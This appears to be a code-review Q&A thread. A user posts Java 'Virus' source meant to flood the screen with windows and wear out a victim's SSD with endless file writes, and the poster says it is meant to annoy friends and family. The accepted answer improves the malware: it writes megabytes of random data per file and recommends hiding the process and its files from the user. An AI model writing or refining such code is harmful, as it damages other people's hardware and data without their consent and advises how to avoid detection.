# Java program to disturb user and waste SSD lifetime

Tags: java, file, swing

This Program has three goals:

1. Disturbing the user that accidentally run this by opening a lot of windows
2. Creating a lot of files that waste the lifetime of SSD's
3. Destroying Overview and waste time - A lot of files shall be created also to prolong the time that is needed to delete all the unnessecary files.

Ideally, creating unnecessary windows prevents you from prematurely quitting the program: opening the Task Manager should take a long time.
The goal of this little program is to defend myself as a script kiddie and annoy my friends and family members.

Virus.java

```
public class Virus {
    public static void main(String[] args) {
        new FrameCreator().start();
        new FileCreator().start();
    }
}
```

FileCreator.java

```
import java.io.File;
import java.io.FileWriter;
import java.io.BufferedWriter;
import java.io.IOException;

public class FileCreator extends Thread {
    @Override
    public void run() {
        int number = 0;
        while (true) {
            File file = new File(Integer.toString(number));
            number++;
            try (BufferedWriter bw = new BufferedWriter(new FileWriter(file))) {
                bw.write("bla");
            } catch (IOException e) {
                System.out.println("Virus could not be executed properly :(");
            }
        }
    }
}
```

FrameCreator.java

```
import java.util.Random;
import java.awt.FlowLayout;
import javax.swing.JFrame;
import javax.swing.JLabel;

public class FrameCreator extends Thread {
    @Override
    public void run() {
        Random random = new Random();
        while (true) {
            JFrame frame = new JFrame();
            frame.setSize(200, 200);
            frame.getContentPane().setLayout(new FlowLayout());
            frame.getContentPane().add(new JLabel("I prefer old HDD's."));
            frame.setVisible(true);
            frame.setLocation(random.nextInt(800), random.nextInt(600));
            try {
                Thread.sleep(40);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
}
```

Comment: Did you test it?

Comment: In what sense is this a virus? It doesn't propagate itself in any way.

Comment: I have tested it. Is there a bug in my program?

Comment: What exactly is the purpose of this so-called 'virus'? To take revenge on people using SSDs?

Comment: The goal was to create a program that causes anger by the unlucky person that executes the program. The dislikes may be a hint that I was successful!

Comment: I don't think *anybody* would accidentally run this, let alone have 7 people run it by accident. The dislikes are a hint that your question is unclear and confusing.

Answer (score 7, accepted):

Your program is very inefficient.

First, to use up the SSD write cycles, you should write lots of data. A single three-bytes string is not that much. Plus, there might be SSD implementations that detect when the same block is written and just store a pointer to the block, using copy-on-write.

Instead, you should prepare a buffer with random data (a few megabytes is fine), write this buffer to a file, change one byte in each 512-byte area of the buffer and then write the buffer again, appending to the same file. This is probably handled more efficiently by the operating system than creating lots of very small files.

To create real damage, your program should hide itself. Creating lots of pop-up windows is a very bad strategy since the user immediately notices that something is going on, navigates to the task manager and just kills the process, which closes all the windows at once.

Therefore, don't interact with the user at all. Don't annoy them, don't let them even notice anything. Now this gets tricky since you have two opposing goals:

- Write to the SSD as fast as possible. This takes CPU cycles and will therefore probably activate the CPU fan after a short time.
- Be unsuspicious. This means reducing the write speed to a level that will not make any noise.

To reduce the load on the CPU, you should not use character streams at all since the characters need to be converted into bytes before being written to disk. This takes time and makes noise. Instead, use a `byte[]` and write to a byte stream. You can even [think about memory mapping](http://www.baeldung.com/java-mapped-byte-buffer) to avoid copying memory blocks.

To hide the generated file, don't create it in the current folder. Instead, hide it in `AppData/Local/Temp` or `~/.local/config`, it will keep hidden longer than in `~/Downloads`.

Instead of extending the `Thread` class, you should [implement `Runnable`](https://stackoverflow.com/q/107823). Luckily, you start your threads instead of running them, so you are not bitten by that bug. But there was a different memory leak bug in Java >= 6, I just don't remember the exact details.

If your target environment is Java >= 8, you can write much less code by just having two methods and converting them to `Runnable` implicitly:

```
import java.awt.FlowLayout;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Random;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.SwingUtilities;

public class Virus {

    public static void main(String... args) {
        new Thread(Virus::createFiles).start();
        new Thread(Virus::openWindows).start();
    }

    private static void createFiles() {
        byte[] bytes = new byte[1 << 20];
        new Random().nextBytes(bytes);

        int number = 0;
        while (true) {
            try {
                Files.write(Paths.get(Integer.toString(number)), bytes);
                number++;
            } catch (IOException e) {
                System.out.println("Virus could not be executed properly :(");
            }
        }
    }

    private static void openWindows() {
        while (true) {
            SwingUtilities.invokeLater(Virus::openSingleWindow);
        }
    }

    private static void openSingleWindow() {
        Random random = new Random();
        JFrame frame = new JFrame();
        frame.setSize(200, 200);
        frame.getContentPane().setLayout(new FlowLayout());
        frame.getContentPane().add(new JLabel("I prefer old HDD's."));
        frame.setVisible(true);
        frame.setLocation(random.nextInt(800), random.nextInt(600));
        try {
            Thread.sleep(40);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

Using method references instead of implementing the `Runnable` interface explicitly saves a lot of code, especially for UI applications that have lots of very small event handlers.

When doing UI operations in multithreaded applications, you have to be very careful about thread synchronization. Therefore, any UI related code should run in the main Swing thread (`SwingUtilities.invokeLater`).

By the way, a characteristic feature of a virus is that it spreads. Your program doesn't do this, therefore you should call it only `Malware`, not virus. It also doesn't infect other programs by changing their executable code, therefore it could only be a worm. If you do damage, at least get the terminology right. :)

Comment: In addition to not alerting the user, not writing in Java might help, the JVM won't be required and the user won't be missing a lot of memory.